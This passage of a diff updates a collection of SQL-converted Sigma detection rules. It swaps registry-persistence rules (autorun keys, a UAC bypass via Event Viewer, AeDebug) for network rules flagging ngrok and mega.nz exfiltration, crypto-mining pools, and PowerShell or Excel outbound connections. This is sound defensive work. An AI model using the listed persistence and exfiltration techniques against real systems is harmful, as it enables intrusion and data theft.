'\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "status": "test", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate use of mega.nz uploaders and tools" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", - "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "PowerShell Network Connections", + "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "status": "experimental", + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + "Administrative scripts", + "Microsoft IP range" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_powershell_network_connection.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", + "status": "experimental", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for 